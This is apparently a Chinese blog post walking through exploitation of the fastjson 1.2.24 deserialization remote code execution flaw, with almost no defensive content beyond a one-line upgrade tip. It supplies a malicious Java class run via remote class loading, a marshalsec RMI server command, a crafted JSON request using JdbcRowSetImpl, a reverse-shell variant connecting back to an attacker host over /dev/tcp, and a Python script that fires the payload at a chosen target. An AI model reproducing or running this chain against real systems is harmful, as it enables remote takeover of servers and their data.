• fastjson 1.2.24 反序列化导致任意命令执行漏洞


    简介

    Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。

    Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。

    poc

    //FileName:Exploit.java
    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    

    编译成class的文件上传到vps。

    javac   Exploit.java
    

    通过python3 启动http服务,将poc移至改目录。

    python3   -m   http.server 8888
    

    image-20210115102538650

    开启远程加载类服务,可以通过Jrmp服务或者Ldap服务加载远程类文件

    JRMP服务

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999
    

    image-20210115105818956

    构造数据包加载远程类

    POST / HTTP/1.1
    Host: your-ip:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 160
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://vps:9999/TouchFile",
            "autoCommit":true
        }
    }
    

    image-20210115105644291

    文件被创建,命令执行成功

    image-20210115103425601

    反弹shell

    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >&  /dev/tcp/vps/55555 0>&1"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    
    

    image-20210115104239463

    工具附件

    脚本检测:

    #FileName:fastjson-1.2.24_rce.py
    
    import sys
    import requests
    
    if len(sys.argv)!=3:
        print('+------------------------------------------------------------------------------------+')
        print('+      RMIServer: rmi://ip:port/exp                                                  +')
        print('+      LDAPServer: ldap://ip:port/exp                                                +')
        print('+------------------------------------------------------------------------------------+')
        print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer>                               +')
        print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object  +')
        print('+ VER: fastjson<=1.2.24                                                              +')
        print('+------------------------------------------------------------------------------------+')
        sys.exit()
    
    url = sys.argv[1]
    server = sys.argv[2]
    
    headers = {
        'Host': "127.0.0.1",
        'Content-Type': "application/json",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Accept': "*/*",
        'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
        }
     
    
    payload = '''
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"%s",
            "autoCommit":true
        }
    }  
    ''' %server
    
    
    try:
        r = requests.post(url, payload, headers=headers, timeout=10)
        print ("[+] RMI/LDAP Send Success ")
    except:
        print ("[-] RMI/LDAP Send Failed ")
    
    
    python fastjson-1.2.24_rce.py
    

    image-20210115110503006

    修复建议

    升级fastjson到最新版本

    本文由博客群发一文多发等运营工具平台 OpenWrite 发布

  • 相关阅读:
    vim for python配置
    Python学习的一些好资料
    【Python开发实战】Python环境的配置
    【Python开发实战】Windows7+VirtualBox+Ubuntu环境配置
    linux下shapely的安装
    【python常用模块】os.path
    linux下gdal的python包的安装
    由二叉树的前序遍历和中序遍历,求其后序遍历
    ASCII码表
    C++标准库函数之排列函数
  • 原文地址:https://www.cnblogs.com/dyanbk/p/14281460.html
Copyright © 2020-2023  润新知